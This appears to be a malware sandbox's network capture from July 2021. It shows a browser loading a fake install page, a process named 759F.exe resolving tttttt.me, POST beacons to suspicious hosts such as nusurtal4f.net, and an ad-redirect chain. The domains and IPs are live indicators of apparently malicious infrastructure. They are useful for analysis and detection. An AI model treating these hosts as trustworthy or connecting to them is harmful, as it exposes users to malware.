                                                                                          Host: www.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 31283
                                                                                          Etag: "-70761292"
                                                                                          Date: Fri, 09 Jul 2021 23:21:00 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.acnav.online/js/global.min.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /js/global.min.js HTTP/1.1
                                                                                          Accept: application/javascript, */*;q=0.8
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "2171-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:21:00 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: application/javascript
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Encoding: gzip
                                                                                          Transfer-Encoding: chunked
                                                                                          Via: 1.1 vegur
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.acnav.online/images/install-step1-chrome.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /images/install-step1-chrome.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "23056-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:21:00 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: image/png
                                                                                          Content-Length: 23056
                                                                                          Via: 1.1 vegur
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.acnav.online/config.min.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /config.min.js HTTP/1.1
                                                                                          Accept: application/javascript, */*;q=0.8
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "1060-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:21:00 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: application/javascript
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Encoding: gzip
                                                                                          Transfer-Encoding: chunked
                                                                                          Via: 1.1 vegur
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.acnav.online/layouts/box/box.css
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /layouts/box/box.css HTTP/1.1
                                                                                          Accept: text/css, */*
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "10747-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:21:00 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: text/css; charset=UTF-8
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Encoding: gzip
                                                                                          Transfer-Encoding: chunked
                                                                                          Via: 1.1 vegur
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.acnav.online/images/install-step2.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /images/install-step2.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "20738-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:21:00 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: image/png
                                                                                          Content-Length: 20738
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/resources/Wiki/links.json
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /resources/Wiki/links.json HTTP/1.1
                                                                                          Accept: */*
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; _gat=1; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "389-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:21:01 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: application/json
                                                                                          Content-Length: 389
                                                                                          Vary: Accept-Encoding
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/images/install-step3.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /images/install-step3.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "14921-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:21:00 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: image/png
                                                                                          Content-Length: 14921
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/lang/box/ePedia
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /lang/box/ePedia HTTP/1.1
                                                                                          Accept: */*
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; _gat=1; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Content-Type: application/json
                                                                                          Content-Length: 4486
                                                                                          Etag: "1455465032"
                                                                                          Date: Fri, 09 Jul 2021 23:21:01 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/resources/Wiki/logo.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /resources/Wiki/logo.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; _gat=1; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "9614-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:21:01 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: image/png
                                                                                          Content-Length: 9614
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/resources/Wiki/background.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /resources/Wiki/background.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; _gat=1; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "65781-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:21:01 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: image/png
                                                                                          Content-Length: 65781
                                                                                          Via: 1.1 vegur
                                                                                        • DNS
                                                                                          ajax.googleapis.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          ajax.googleapis.com
                                                                                          IN A
                                                                                          Response
                                                                                          ajax.googleapis.com
                                                                                          IN A
                                                                                          142.250.179.202
                                                                                        • DNS
                                                                                          www.acnav.online
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.acnav.online
                                                                                          IN A
                                                                                          Response
                                                                                          www.acnav.online
                                                                                          IN CNAME
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          IN A
                                                                                          54.91.59.199
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          IN A
                                                                                          3.220.57.224
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          IN A
                                                                                          52.20.78.240
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          IN A
                                                                                          3.232.242.170
                                                                                        • GET
                                                                                          https://www.acnav.online/favicon.ico
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /favicon.ico HTTP/1.1
                                                                                          Accept: */*
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Host: www.acnav.online
                                                                                          DNT: 1
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Content-Type: text/html
                                                                                          Vary: Accept-Encoding
                                                                                          Date: Fri, 09 Jul 2021 23:21:01 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/resources/Wiki/favicon.ico
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /resources/Wiki/favicon.ico HTTP/1.1
                                                                                          Accept: */*
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Host: www.acnav.online
                                                                                          DNT: 1
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "370070-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:21:01 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: image/x-icon
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Encoding: gzip
                                                                                          Transfer-Encoding: chunked
                                                                                          Via: 1.1 vegur
                                                                                        • DNS
                                                                                          cdnjs.cloudflare.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          cdnjs.cloudflare.com
                                                                                          IN A
                                                                                          Response
                                                                                          cdnjs.cloudflare.com
                                                                                          IN A
                                                                                          104.16.18.94
                                                                                          cdnjs.cloudflare.com
                                                                                          IN A
                                                                                          104.16.19.94
                                                                                        • DNS
                                                                                          www.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 109
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:22:01 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 7
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          i.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          i.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          i.instagram.com
                                                                                          IN CNAME
                                                                                          instagram.c10r.facebook.com
                                                                                          instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.52
                                                                                        • DNS
                                                                                          tttttt.me
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • DNS
                                                                                          tttttt.me
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • DNS
                                                                                          www.instagram.com
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • DNS
                                                                                          www.instagram.com
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • DNS
                                                                                          tttttt.me
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • DNS
                                                                                          www.instagram.com
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • DNS
                                                                                          nusurtal4f.net
                                                                                          Request
                                                                                          nusurtal4f.net
                                                                                          IN A
                                                                                          Response
                                                                                          nusurtal4f.net
                                                                                          IN A
                                                                                          5.61.43.76
                                                                                        • POST
                                                                                          http://nusurtal4f.net/
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 337
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:23:53 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 7
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • DNS
                                                                                          i.instagram.com
                                                                                          Request
                                                                                          i.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          i.instagram.com
                                                                                          IN CNAME
                                                                                          instagram.c10r.facebook.com
                                                                                          instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.52
                                                                                        • DNS
                                                                                          tttttt.me
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • DNS
                                                                                          tttttt.me
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • DNS
                                                                                          www.directdexchange.com
                                                                                          Request
                                                                                          www.directdexchange.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.directdexchange.com
                                                                                          IN CNAME
                                                                                          directdexchange.com
                                                                                          directdexchange.com
                                                                                          IN A
                                                                                          35.201.70.46
                                                                                        • GET
                                                                                          https://www.directdexchange.com/jump/next.php?r=4263119
                                                                                          Request
                                                                                          GET /jump/next.php?r=4263119 HTTP/2.0
                                                                                          host: www.directdexchange.com
                                                                                          accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          server: openresty
                                                                                          date: Fri, 09 Jul 2021 23:24:59 GMT
                                                                                          content-type: text/html; charset=utf-8
                                                                                          access-control-allow-origin: *
                                                                                          content-encoding: gzip
                                                                                          via: 1.1 google
                                                                                          alt-svc: clear
                                                                                        • GET
                                                                                          https://www.directdexchange.com/jump/next.php?stamat=m%7C%2CwIhFWYhFqB1dwP0dEdHP3xP.add%2C2t5FkDDYpjxJXsMWHSh7wKsTFo_9DWdVnHcBDLzDvAV_XvQEgAXq-k8ZBXLExqg8&cbrandom=0.4845958254496212&cbtitle=&cbiframe=0&cbWidth=800&cbHeight=555&cbdescription=&cbkeywords=&cbref=
                                                                                          Request
                                                                                          GET /jump/next.php?stamat=m%7C%2CwIhFWYhFqB1dwP0dEdHP3xP.add%2C2t5FkDDYpjxJXsMWHSh7wKsTFo_9DWdVnHcBDLzDvAV_XvQEgAXq-k8ZBXLExqg8&cbrandom=0.4845958254496212&cbtitle=&cbiframe=0&cbWidth=800&cbHeight=555&cbdescription=&cbkeywords=&cbref= HTTP/2.0
                                                                                          host: www.directdexchange.com
                                                                                          accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          referer: https://www.directdexchange.com/jump/next.php?r=4263119
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 302
                                                                                          server: openresty
                                                                                          date: Fri, 09 Jul 2021 23:24:59 GMT
                                                                                          content-type: text/html; charset=utf-8
                                                                                          access-control-allow-origin: *
                                                                                          location: https://www.directdexchange.com/script/i.php?stamat=m%7C%2C%2CQjdvYidroGU3BU9GH0dEdHP3xP.3ed%2CplWRIlJnJjowuUKAKwGLzdbLV0LL6STDhH_1Q7WjzkXBxdWHS_1ZRZ2yTEJJDelXgJzXO5s2fp8Jfr6ZtnAQk6Jj_Ns1ozOZ3cn0UT-BFKspptjJmV4iBgP6r73OaIk-a1dsOiEQciNZDHfHy-aC_rOJvGAeDUfO6NEMdhXdtVFxyfFdzPU-nHFTVlRIgWPmvJcy6riwtqrfHhRfkN3-Ut4LgrmiMcX39frn8mDwBbj4kuTzHEkSdViRBG4Bz1QGpTdEgpwecdq6eWj3IYk7nf8M9_9PsxqOe85fuNFVLrn7hBp7Z_2baycLG2wvQPUUi0J2bbvO5RnWmjFJ95POMhD8ZEJVnDLk_rmzwhO04Pj1ZPnMXtx5XvAKl56GLlS0qHIZF9Rr8GZ8tKbmnnou1SfM7LfWVDUDjfXdyP1RSMBaxm9DjWXA9IRjv-mSxexNl03FOG-hAqXGoYDXJnxHKs61r3i2hlrAZGOTawRqPvg%2C
                                                                                          via: 1.1 google
                                                                                          alt-svc: clear
                                                                                        • GET
                                                                                          https://www.directdexchange.com/script/i.php?stamat=m%7C%2C%2CQjdvYidroGU3BU9GH0dEdHP3xP.3ed%2CplWRIlJnJjowuUKAKwGLzdbLV0LL6STDhH_1Q7WjzkXBxdWHS_1ZRZ2yTEJJDelXgJzXO5s2fp8Jfr6ZtnAQk6Jj_Ns1ozOZ3cn0UT-BFKspptjJmV4iBgP6r73OaIk-a1dsOiEQciNZDHfHy-aC_rOJvGAeDUfO6NEMdhXdtVFxyfFdzPU-nHFTVlRIgWPmvJcy6riwtqrfHhRfkN3-Ut4LgrmiMcX39frn8mDwBbj4kuTzHEkSdViRBG4Bz1QGpTdEgpwecdq6eWj3IYk7nf8M9_9PsxqOe85fuNFVLrn7hBp7Z_2baycLG2wvQPUUi0J2bbvO5RnWmjFJ95POMhD8ZEJVnDLk_rmzwhO04Pj1ZPnMXtx5XvAKl56GLlS0qHIZF9Rr8GZ8tKbmnnou1SfM7LfWVDUDjfXdyP1RSMBaxm9DjWXA9IRjv-mSxexNl03FOG-hAqXGoYDXJnxHKs61r3i2hlrAZGOTawRqPvg%2C
                                                                                          Request
                                                                                          GET /script/i.php?stamat=m%7C%2C%2CQjdvYidroGU3BU9GH0dEdHP3xP.3ed%2CplWRIlJnJjowuUKAKwGLzdbLV0LL6STDhH_1Q7WjzkXBxdWHS_1ZRZ2yTEJJDelXgJzXO5s2fp8Jfr6ZtnAQk6Jj_Ns1ozOZ3cn0UT-BFKspptjJmV4iBgP6r73OaIk-a1dsOiEQciNZDHfHy-aC_rOJvGAeDUfO6NEMdhXdtVFxyfFdzPU-nHFTVlRIgWPmvJcy6riwtqrfHhRfkN3-Ut4LgrmiMcX39frn8mDwBbj4kuTzHEkSdViRBG4Bz1QGpTdEgpwecdq6eWj3IYk7nf8M9_9PsxqOe85fuNFVLrn7hBp7Z_2baycLG2wvQPUUi0J2bbvO5RnWmjFJ95POMhD8ZEJVnDLk_rmzwhO04Pj1ZPnMXtx5XvAKl56GLlS0qHIZF9Rr8GZ8tKbmnnou1SfM7LfWVDUDjfXdyP1RSMBaxm9DjWXA9IRjv-mSxexNl03FOG-hAqXGoYDXJnxHKs61r3i2hlrAZGOTawRqPvg%2C HTTP/2.0
                                                                                          host: www.directdexchange.com
                                                                                          accept: text/html, application/xhtml+xml, image/jxr, */*
